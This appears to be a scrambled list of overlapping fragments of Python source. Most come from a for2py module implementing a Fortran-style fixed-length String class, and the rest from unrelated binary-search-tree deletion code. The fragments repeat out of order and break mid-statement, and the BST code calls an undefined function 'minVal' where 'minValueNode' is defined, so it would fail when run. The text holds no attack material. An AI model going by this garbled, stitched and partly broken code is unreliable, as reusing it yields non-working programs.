[ "def set_substr(self, i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)] #", "trailing blanks and adds blanks on the left so that the result is", "string value newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def", "other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL()", "1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other):", "the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str", "strval): s = self.value(strval) n = len(s) if n < self._length: adjusted =", "self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val = adjusted def", "\"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes leading blanks and", "string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self,", "substr = self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)] +", "use the name f_index to emphasize that the behavior of Fortran's INDEX() is", "= self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1 def len_trim(self): return", "If the argument direction contains \"back\" the string is searched backwards starting from", "in the code generated by for2py. Usage: see the document \"for2py: Miscellaneous constructs\"", "f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX() function;", "!= length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val else: return", "is slightly different from that of Python's index(). f_index() returns the position within", "\"\"\" class String: def __init__(self, length = 0, value = \"\"): if length", "value is assigned to self._val, it may need to be adjusted # if", "to emphasize that the behavior of Fortran's INDEX() is slightly different from that", "self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return", "if n < self._length: # pad with blanks k = self._length - n", "result is the same length as the input string.\"\"\" s = self._val.rstrip() pad_str", "blanks k = self._length - n pad_str = \" \" * k else:", "ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract", "+ self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self):", "self._length = length else: self._length = len(value) # Before value is assigned to", "pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes", "isinstance(obj, String): return obj._val else: return obj def padding(self, n): \"\"\"padding() returns a", "implements the ADJUSTL() function of Fortran. This function removes leading blanks and adds", "is the same length as the input string.\"\"\" s = self._val.lstrip() pad_str =", "to the Fortran CHARACTER type) in the code generated by for2py. Usage: see", "occurrence. 
If the argument direction contains \"back\" the string is searched backwards starting", "the left so that the result is the same length as the input", "def repeat(self, n): return self._val * n def trim(self): return self._val.rstrip() def get_substr(self,", "__len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def", "n): return self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i, j):", "that of Python's index(). f_index() returns the position within a string where substring", "This function removes trailing blanks and adds blanks on the left so that", "= self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def __str__(self): return self._val", "self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j)", "return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran.", "is searched backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\" in", "same length as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return", "value newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr) def __str__(self):", "len(s) if n < self._length: adjusted = s + self.padding(n) else: adjusted =", "adds blanks on the right so that the result is the same length", "set_substr(self, i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct", "self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl()", "else: return obj def padding(self, n): \"\"\"padding() returns a string of blanks of", "(start position = 1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self,", "\"\"\"f_index() implements the string search function of Fortran's INDEX() function; we use the", "length else: self._length = len(value) # Before value is assigned to self._val, it", "Python's index(). f_index() returns the position within a string where substring first occurs;", "beginning at position i (start position = 1) and ending at position j.\"\"\"", "if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val", "Fortran CHARACTER type) in the code generated by for2py. Usage: see the document", "the Fortran CHARACTER type) in the code generated by for2py. Usage: see the", "the right so that the result is the same length as the input", "self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the given", "\"\"\"get_substr(i, j) returns the substring of the given string beginning at position i", "if n < self._length: adjusted = s + self.padding(n) else: adjusted = s[:self._length]", "the code generated by for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\"", "removes trailing blanks and adds blanks on the left so that the result", "blanks and adds blanks on the left so that the result is the", "n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the", "def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes trailing", "occurs; 0 if there is no such occurrence. 
If the argument direction contains", "left so that the result is the same length as the input string.\"\"\"", "string beginning at position i (start position = 1) and ending at position", "a string of blanks of length = sef._length - n.\"\"\" if n <", "\"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other)", "adjusted # if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String):", "truncate to self._length self._val = adjusted def __len__(self): return self._length def __add__(self, other):", "and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): #", "document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0, value", "there is no such occurrence. If the argument direction contains \"back\" the string", "* k else: pad_str = \"\" return pad_str def set_(self, strval): s =", "if isinstance(obj, String): return obj._val else: return obj def padding(self, n): \"\"\"padding() returns", "extract the substring substr = self.value(other)[:(j-i+1)] # construct the new string value newstr", "= self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function", "i (start position = 1) and ending at position j.\"\"\" return self._val[(i-1):j] def", "String): return obj._val else: return obj def padding(self, n): \"\"\"padding() returns a string", "position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the substring", "sef._length - n.\"\"\" if n < self._length: # pad with blanks k =", "def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the given string", "__add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\"", "return pad_str def set_(self, strval): s = self.value(strval) n = len(s) if n", "obj._val else: return obj def padding(self, n): \"\"\"padding() returns a string of blanks", "return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran.", "f_index to emphasize that the behavior of Fortran's INDEX() is slightly different from", "def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self):", "construct the new string value newstr = self._val[:(i-1)] + substr + self._val[j:] #", "the new string value newstr = self._val[:(i-1)] + substr + self._val[j:] # update", "pad_str = \" \" * k else: pad_str = \"\" return pad_str def", "if there is no such occurrence. If the argument direction contains \"back\" the", "input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def", "pad_str = \"\" return pad_str def set_(self, strval): s = self.value(strval) n =", "Fortran. 
This function removes leading blanks and adds blanks on the right so", "k else: pad_str = \"\" return pad_str def set_(self, strval): s = self.value(strval)", "# truncate to self._length self._val = adjusted def __len__(self): return self._length def __add__(self,", "def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other)", "= self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n):", "Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0, value = \"\"):", "that the result is the same length as the input string.\"\"\" s =", "def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements", "strings.py Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER type) in", "= len(s) if n < self._length: adjusted = s + self.padding(n) else: adjusted", "a string where substring first occurs; 0 if there is no such occurrence.", "removes leading blanks and adds blanks on the right so that the result", "s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring,", "contains \"back\" the string is searched backwards starting from the end.\"\"\" substr =", "pad with blanks k = self._length - n pad_str = \" \" *", "def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String", "j, other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct the new", "end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos", "assigned to self._val, it may need to be adjusted # if len(value) !=", "else: pos = self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def", "self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return", "Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length", "the same length as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s))", "function of Fortran's INDEX() function; we use the name f_index to emphasize that", "implements the ADJUSTR() function of Fortran. This function removes trailing blanks and adds", "code generated by for2py. 
Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class", "adds blanks on the left so that the result is the same length", "to self._val, it may need to be adjusted # if len(value) != length", "Before value is assigned to self._val, it may need to be adjusted #", "blanks on the left so that the result is the same length as", "__radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val def adjustl(self): \"\"\"adjustl() implements the", "return len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self): return self._val.rstrip()", "self._length - n pad_str = \" \" * k else: pad_str = \"\"", "other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return", "position i (start position = 1) and ending at position j.\"\"\" return self._val[(i-1):j]", "string of blanks of length = sef._length - n.\"\"\" if n < self._length:", "at position i (start position = 1) and ending at position j.\"\"\" return", "self._length self._val = adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\"", "emphasize that the behavior of Fortran's INDEX() is slightly different from that of", "see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length =", "on the right so that the result is the same length as the", "= len(value) # Before value is assigned to self._val, it may need to", "= 1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j,", "length as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s", "s + self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val =", "= self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements", "from the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr)", "that the behavior of Fortran's INDEX() is slightly different from that of Python's", "= self.value(strval) n = len(s) if n < self._length: adjusted = s +", "0 if there is no such occurrence. If the argument direction contains \"back\"", "starting from the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos =", "new string value newstr = self._val[:(i-1)] + substr + self._val[j:] # update self.set_(newstr)", "string is searched backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\"", "Fortran. This function removes trailing blanks and adds blanks on the left so", "len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String): return obj._val else:", "returns a string of blanks of length = sef._length - n.\"\"\" if n", "j) returns the substring of the given string beginning at position i (start", "# construct the new string value newstr = self._val[:(i-1)] + substr + self._val[j:]", "get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the given string beginning", "INDEX() is slightly different from that of Python's index(). 
f_index() returns the position", "if \"back\" in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos", "substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX() function; we", "= s[:self._length] # truncate to self._length self._val = adjusted def __len__(self): return self._length", "returns the position within a string where substring first occurs; 0 if there", "INDEX() function; we use the name f_index to emphasize that the behavior of", "self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the", "with blanks k = self._length - n pad_str = \" \" * k", "< self._length: adjusted = s + self.padding(n) else: adjusted = s[:self._length] # truncate", "# if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj, String): return", "\"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes trailing blanks and", "function; we use the name f_index to emphasize that the behavior of Fortran's", "string where substring first occurs; 0 if there is no such occurrence. If", "may need to be adjusted # if len(value) != length self.set_(value) def value(self,", "def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX()", "repeat(self, n): return self._val * n def trim(self): return self._val.rstrip() def get_substr(self, i,", "the substring of the given string beginning at position i (start position =", "def __init__(self, length = 0, value = \"\"): if length > 0: self._length", "\"back\" the string is searched backwards starting from the end.\"\"\" substr = self.value(substring)", "pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR()", "position within a string where substring first occurs; 0 if there is no", "concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) +", "is no such occurrence. 
If the argument direction contains \"back\" the string is", "we use the name f_index to emphasize that the behavior of Fortran's INDEX()", "def set_(self, strval): s = self.value(strval) n = len(s) if n < self._length:", "= self._length - n pad_str = \" \" * k else: pad_str =", "self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self, other):", "self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string", "> 0: self._length = length else: self._length = len(value) # Before value is", "< self._length: # pad with blanks k = self._length - n pad_str =", "s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr()", "return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of the", "Fortran's INDEX() function; we use the name f_index to emphasize that the behavior", "else: pad_str = \"\" return pad_str def set_(self, strval): s = self.value(strval) n", "string objects (corresponding to the Fortran CHARACTER type) in the code generated by", "obj): if isinstance(obj, String): return obj._val else: return obj def padding(self, n): \"\"\"padding()", "\"\" return pad_str def set_(self, strval): s = self.value(strval) n = len(s) if", "the position within a string where substring first occurs; 0 if there is", "where substring first occurs; 0 if there is no such occurrence. If the", "padding(self, n): \"\"\"padding() returns a string of blanks of length = sef._length -", "need to be adjusted # if len(value) != length self.set_(value) def value(self, obj):", "the ADJUSTR() function of Fortran. This function removes trailing blanks and adds blanks", "self._val def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes", "direction contains \"back\" the string is searched backwards starting from the end.\"\"\" substr", "trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring of", "from that of Python's index(). f_index() returns the position within a string where", "as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str +", "pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function", "and adds blanks on the right so that the result is the same", "+ pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function", "index(). f_index() returns the position within a string where substring first occurs; 0", "pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements", "= \"\" return pad_str def set_(self, strval): s = self.value(strval) n = len(s)", "the behavior of Fortran's INDEX() is slightly different from that of Python's index().", "return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search", "+ self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val = adjusted", "k = self._length - n pad_str = \" \" * k else: pad_str", "in direction: pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1", "s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. 
This", "substring of the given string beginning at position i (start position = 1)", "the string is searched backwards starting from the end.\"\"\" substr = self.value(substring) if", "objects (corresponding to the Fortran CHARACTER type) in the code generated by for2py.", "else: adjusted = s[:self._length] # truncate to self._length self._val = adjusted def __len__(self):", "the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0,", "direction=[]): \"\"\"f_index() implements the string search function of Fortran's INDEX() function; we use", "\"\"\" File: strings.py Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER", "blanks and adds blanks on the right so that the result is the", "ADJUSTR() function of Fortran. This function removes trailing blanks and adds blanks on", "pad_str def set_(self, strval): s = self.value(strval) n = len(s) if n <", "= self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]):", "# pad with blanks k = self._length - n pad_str = \" \"", "def adjustl(self): \"\"\"adjustl() implements the ADJUSTL() function of Fortran. This function removes leading", "adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val +", "pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val *", "j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the substring substr", "* n def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns", "\" \" * k else: pad_str = \"\" return pad_str def set_(self, strval):", "self.value(strval) n = len(s) if n < self._length: adjusted = s + self.padding(n)", "the argument direction contains \"back\" the string is searched backwards starting from the", "= \" \" * k else: pad_str = \"\" return pad_str def set_(self,", "obj def padding(self, n): \"\"\"padding() returns a string of blanks of length =", "= adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val", "within a string where substring first occurs; 0 if there is no such", "name f_index to emphasize that the behavior of Fortran's INDEX() is slightly different", "implementing string objects (corresponding to the Fortran CHARACTER type) in the code generated", "i, j, other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct the", "String: def __init__(self, length = 0, value = \"\"): if length > 0:", "# extract the substring substr = self.value(other)[:(j-i+1)] # construct the new string value", "n): \"\"\"padding() returns a string of blanks of length = sef._length - n.\"\"\"", "def trim(self): return self._val.rstrip() def get_substr(self, i, j): \"\"\"get_substr(i, j) returns the substring", "n.\"\"\" if n < self._length: # pad with blanks k = self._length -", "blanks on the right so that the result is the same length as", "at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i, j, other): # extract the", "the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s", "n pad_str = \" \" * k else: pad_str = \"\" return pad_str", "else: self._length = len(value) # Before value is assigned to self._val, it may", "\"for2py: Miscellaneous constructs\" \"\"\" class String: def __init__(self, length = 0, value =", "(corresponding to the Fortran CHARACTER type) in 
the code generated by for2py. Usage:", "len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self): return self._val.rstrip() def", "implements the string search function of Fortran's INDEX() function; we use the name", "set_(self, strval): s = self.value(strval) n = len(s) if n < self._length: adjusted", "the end.\"\"\" substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else:", "<filename>delphi/translators/for2py/strings.py \"\"\" File: strings.py Purpose: Code implementing string objects (corresponding to the Fortran", "the substring substr = self.value(other)[:(j-i+1)] # construct the new string value newstr =", "\"\"\"padding() returns a string of blanks of length = sef._length - n.\"\"\" if", "self._length: # pad with blanks k = self._length - n pad_str = \"", "by for2py. Usage: see the document \"for2py: Miscellaneous constructs\" \"\"\" class String: def", "# Before value is assigned to self._val, it may need to be adjusted", "is assigned to self._val, it may need to be adjusted # if len(value)", "substring substr = self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)]", "return self._length def __add__(self, other): \"\"\"String concatenation\"\"\" return self._val + self.value(other) def __radd__(self,", "of length = sef._length - n.\"\"\" if n < self._length: # pad with", "string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s + pad_str def adjustr(self):", "of blanks of length = sef._length - n.\"\"\" if n < self._length: #", "s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the string search function of Fortran's", "\"\"): if length > 0: self._length = length else: self._length = len(value) #", "f_index() returns the position within a string where substring first occurs; 0 if", "searched backwards starting from the end.\"\"\" substr = self.value(substring) if \"back\" in direction:", "right so that the result is the same length as the input string.\"\"\"", "- n pad_str = \" \" * k else: pad_str = \"\" return", "self.padding(len(s)) return s + pad_str def adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of", "pos = self._val.find(substr) return pos + 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self,", "= self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index() implements the", "0, value = \"\"): if length > 0: self._length = length else: self._length", "be adjusted # if len(value) != length self.set_(value) def value(self, obj): if isinstance(obj,", "= 0, value = \"\"): if length > 0: self._length = length else:", "on the left so that the result is the same length as the", "different from that of Python's index(). f_index() returns the position within a string", "adjustr(self): \"\"\"adjustr() implements the ADJUSTR() function of Fortran. This function removes trailing blanks", "Purpose: Code implementing string objects (corresponding to the Fortran CHARACTER type) in the", "the result is the same length as the input string.\"\"\" s = self._val.rstrip()", "length as the input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str", "argument direction contains \"back\" the string is searched backwards starting from the end.\"\"\"", "the ADJUSTL() function of Fortran. 
This function removes leading blanks and adds blanks", "+ 1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n", "the result is the same length as the input string.\"\"\" s = self._val.lstrip()", "position = 1) and ending at position j.\"\"\" return self._val[(i-1):j] def set_substr(self, i,", "to be adjusted # if len(value) != length self.set_(value) def value(self, obj): if", "so that the result is the same length as the input string.\"\"\" s", "= s + self.padding(n) else: adjusted = s[:self._length] # truncate to self._length self._val", "return self._val + self.value(other) def __radd__(self, other): \"\"\"String concatenation\"\"\" return self.value(other) + self._val", "and adds blanks on the left so that the result is the same", "the given string beginning at position i (start position = 1) and ending", "CHARACTER type) in the code generated by for2py. Usage: see the document \"for2py:", "return obj._val else: return obj def padding(self, n): \"\"\"padding() returns a string of", "of Fortran's INDEX() is slightly different from that of Python's index(). f_index() returns", "self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def f_index(self, substring, direction=[]): \"\"\"f_index()", "len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n def trim(self): return", "__init__(self, length = 0, value = \"\"): if length > 0: self._length =", "input string.\"\"\" s = self._val.rstrip() pad_str = self.padding(len(s)) return pad_str + s def", "substring first occurs; 0 if there is no such occurrence. If the argument", "1 def len_trim(self): return len(self._val.rstrip()) def repeat(self, n): return self._val * n def", "blanks of length = sef._length - n.\"\"\" if n < self._length: # pad", "pos = self._val.rfind(substr) else: pos = self._val.find(substr) return pos + 1 def len_trim(self):", "same length as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return", "= self.value(other)[:(j-i+1)] # construct the new string value newstr = self._val[:(i-1)] + substr", "- n.\"\"\" if n < self._length: # pad with blanks k = self._length", "to self._length self._val = adjusted def __len__(self): return self._length def __add__(self, other): \"\"\"String", "of Fortran's INDEX() function; we use the name f_index to emphasize that the", "substr = self.value(substring) if \"back\" in direction: pos = self._val.rfind(substr) else: pos =", "other): # extract the substring substr = self.value(other)[:(j-i+1)] # construct the new string", "length = sef._length - n.\"\"\" if n < self._length: # pad with blanks", "def padding(self, n): \"\"\"padding() returns a string of blanks of length = sef._length", "as the input string.\"\"\" s = self._val.lstrip() pad_str = self.padding(len(s)) return s +", "len(value) # Before value is assigned to self._val, it may need to be", "slightly different from that of Python's index(). f_index() returns the position within a", "such occurrence. If the argument direction contains \"back\" the string is searched backwards", "type) in the code generated by for2py. 
Usage: see the document "for2py: Miscellaneous constructs"
"""


class String:
    def __init__(self, length=0, value=""):
        if length > 0:
            self._length = length
        else:
            self._length = len(value)
        # Before value is assigned to self._val, it may need to be adjusted
        # if len(value) != length.
        self.set_(value)

    def value(self, obj):
        """value() returns the underlying Python string of its argument,
           whether that argument is a String object or a plain string."""
        if isinstance(obj, String):
            return obj._val
        else:
            return obj

    def padding(self, n):
        """padding() returns a string of blanks of length self._length - n."""
        if n < self._length:
            # pad with blanks
            k = self._length - n
            pad_str = " " * k
        else:
            pad_str = ""
        return pad_str

    def set_(self, strval):
        s = self.value(strval)
        n = len(s)
        if n < self._length:
            adjusted = s + self.padding(n)
        else:
            adjusted = s[:self._length]    # truncate to self._length
        self._val = adjusted

    def __len__(self):
        return self._length

    def __add__(self, other):
        """String concatenation"""
        return self._val + self.value(other)

    def __radd__(self, other):
        """String concatenation"""
        return self.value(other) + self._val

    def adjustl(self):
        """adjustl() implements the ADJUSTL() function of Fortran.
           This function removes leading blanks and adds blanks on the right
           so that the result is the same length as the input string."""
        s = self._val.lstrip()
        pad_str = self.padding(len(s))
        return s + pad_str

    def adjustr(self):
        """adjustr() implements the ADJUSTR() function of Fortran.
           This function removes trailing blanks and adds blanks on the left
           so that the result is the same length as the input string."""
        s = self._val.rstrip()
        pad_str = self.padding(len(s))
        return pad_str + s

    def f_index(self, substring, direction=[]):
        """f_index() implements the string search function of Fortran's
           INDEX() function; we use the name f_index to emphasize that the
           behavior of Fortran's INDEX() is slightly different from that of
           Python's index().  f_index() returns the position within a string,
           counting from 1, where substring first occurs; 0 if there is no
           such occurrence.  If the argument direction contains "back" the
           string is searched backwards starting from the end."""
        substr = self.value(substring)
        if "back" in direction:
            pos = self._val.rfind(substr)
        else:
            pos = self._val.find(substr)
        return pos + 1    # find()/rfind() return -1 on failure, giving 0 here

    def len_trim(self):
        return len(self._val.rstrip())

    def repeat(self, n):
        return self._val * n

    def trim(self):
        return self._val.rstrip()

    def get_substr(self, i, j):
        """get_substr(i, j) returns the substring of the given string
           beginning at position i (start position = 1) and ending at
           position j."""
        return self._val[(i-1):j]

    def set_substr(self, i, j, other):
        # extract the substring
        substr = self.value(other)[:(j-i+1)]
        # construct the new string value
        newstr = self._val[:(i-1)] + substr + self._val[j:]
        # update
        self.set_(newstr)

    def __str__(self):
        return self._val
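
# A minimal usage sketch of the String class above; the expected values in
# the comments follow from the fixed-length Fortran CHARACTER semantics it
# implements. This demo block is illustrative and not part of the code that
# for2py generates.
if __name__ == "__main__":
    s = String(8, "abc")         # fixed length 8; value is padded to "abc     "
    print(len(s))                # 8
    print(s.len_trim())          # 3 -- length ignoring trailing blanks
    print(repr(s.adjustr()))     # '     abc' -- blanks moved to the left
    print(s.f_index("bc"))       # 2 -- 1-based position; 0 if absent
    s.set_substr(1, 3, "xyz")
    print(repr(str(s)))          # 'xyz     '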
[ "< root.data: root.left = deleteNode(root.left, key) # If the key to be deleted", "nodes exists, get the inorder successor root.data = v.data root.right = deleteNode(root.right, v.data)", "If the key to be deleted is smaller than the root's # key", "current = current.left return current def deleteNode(root, key): if root == None: return", "when there is only one child of the root or no child v", "= root # loop down to find the leftmost leaf while(current.left is not", "to be deleted if root.left == None: tmp = root.right root = None", "= minVal(root.right) # When both nodes exists, get the inorder successor root.data =", "cases when there is only one child of the root or no child", "the key to be deleted is smaller than the root's # key then", "tmp = root.right root = None return tmp elif root.right == None: tmp", "deleted is smaller than the root's # key then it lies in left", "loop down to find the leftmost leaf while(current.left is not None): current =", "root.left = deleteNode(root.left, key) # If the key to be deleted is smaller", "smaller than the root's # key then it lies in left subtree elif", "higher node as per the inorder traversal \"\"\" current = root # loop", "be deleted is smaller than the root's # key then it lies in", "successor or the next higher node as per the inorder traversal \"\"\" current", "root = None return tmp elif root.right == None: tmp = root.left root", "node to be deleted if root.left == None: tmp = root.right root =", "it lies in right part else: # The key is same as root's", "# Convers cases when there is only one child of the root or", "root.data: root.right = deleteNode(root.right, key) # If the key to be deleted is", "= deleteNode(root.right, key) # If the key to be deleted is greater than", "root.right == None: tmp = root.left root = None return tmp # Convers", "# key then it lies in right part else: # The key is", "lies in left subtree elif key > root.data: root.right = deleteNode(root.right, key) #", "\"\"\" current = root # loop down to find the leftmost leaf while(current.left", "root.left root = None return tmp # Convers cases when there is only", "\"\"\" Returns the iorder successor or the next higher node as per the", "= deleteNode(root.left, key) # If the key to be deleted is smaller than", "be deleted if root.left == None: tmp = root.right root = None return", "def minValueNode(root): \"\"\" Returns the iorder successor or the next higher node as", "key then it lies in right part else: # The key is same", "None: tmp = root.right root = None return tmp elif root.right == None:", "# loop down to find the leftmost leaf while(current.left is not None): current", "#!/usr/bin/python3 # https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1 def minValueNode(root): \"\"\" Returns the iorder successor or the next", "while(current.left is not None): current = current.left return current def deleteNode(root, key): if", "def deleteNode(root, key): if root == None: return if key < root.data: root.left", "part else: # The key is same as root's key, then this is", "child v = minVal(root.right) # When both nodes exists, get the inorder successor", "= root.right root = None return tmp elif root.right == None: tmp =", "elif key > root.data: root.right = deleteNode(root.right, key) # If the key to", "to be deleted is smaller than the root's # key then it lies", "both nodes exists, get the inorder successor root.data = v.data root.right = deleteNode(root.right,", "in right part else: # The key is same as root's key, then", "# The key is same as 
root's key, then this is the node", "inorder successor root.data = v.data root.right = deleteNode(root.right, v.data) # Delete the inorder", "child of the root or no child v = minVal(root.right) # When both", "root == None: return if key < root.data: root.left = deleteNode(root.left, key) #", "leftmost leaf while(current.left is not None): current = current.left return current def deleteNode(root,", "root's key, then this is the node to be deleted if root.left ==", "to find the leftmost leaf while(current.left is not None): current = current.left return", "deleteNode(root.left, key) # If the key to be deleted is smaller than the", "deleteNode(root.right, key) # If the key to be deleted is greater than the", "in left subtree elif key > root.data: root.right = deleteNode(root.right, key) # If", "key < root.data: root.left = deleteNode(root.left, key) # If the key to be", "== None: tmp = root.right root = None return tmp elif root.right ==", "then it lies in right part else: # The key is same as", "deleted if root.left == None: tmp = root.right root = None return tmp", "if root.left == None: tmp = root.right root = None return tmp elif", "be deleted is greater than the root's # key then it lies in", "= current.left return current def deleteNode(root, key): if root == None: return if", "if root == None: return if key < root.data: root.left = deleteNode(root.left, key)", "as per the inorder traversal \"\"\" current = root # loop down to", "is greater than the root's # key then it lies in right part", "the inorder traversal 